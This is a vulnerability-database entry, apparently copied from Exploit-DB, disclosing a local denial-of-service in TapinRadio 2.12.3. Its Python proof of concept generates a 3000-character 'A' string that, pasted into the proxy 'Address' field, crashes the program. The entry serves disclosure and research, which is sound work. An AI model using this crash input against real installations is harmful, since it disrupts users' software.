Vendor: TapinRadio
By: chuyreds
CVSS: 7.8 (HIGH)
Type: Denial of Service (DoS) Local
CWE: N/A
Product Name: TapinRadio
Affected Version From: 2.12.3
Affected Version To: 2.12.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2020

TapinRadio 2.12.3 – ‘address’ Denial of Service (PoC)

TapinRadio 2.12.3 is vulnerable to a local denial of service when a maliciously crafted 'address' value is supplied in the application proxy settings. To trigger it, an attacker runs the Python code to generate the crafted 'address' value, copies the content to the clipboard, opens TapinRadio, selects 'Settings' > 'Preferences' > 'Miscellaneous', selects 'Set Application Proxy...', and pastes the clipboard into the 'Address' field. After typing '444' in the 'Port' field, 'test' in the 'Username' field and '1234' in the 'Password' field and selecting 'OK' and 'OK', the application crashes.

Mitigation:

N/A

Exploit-DB raw data:

# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: tapinadio_address.py
#2.- Open tapin_add.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..." In "Address" field paste Clipboard
#6.- In Port type "444" > "Username" type "test" > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

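# Crafted 'address' value: 3000 "A" characters
cod = "\x41" * 3000

# Write the value to tapin_add.txt; the context manager closes the file
with open('tapin_add.txt', 'w') as f:
    f.write(cod)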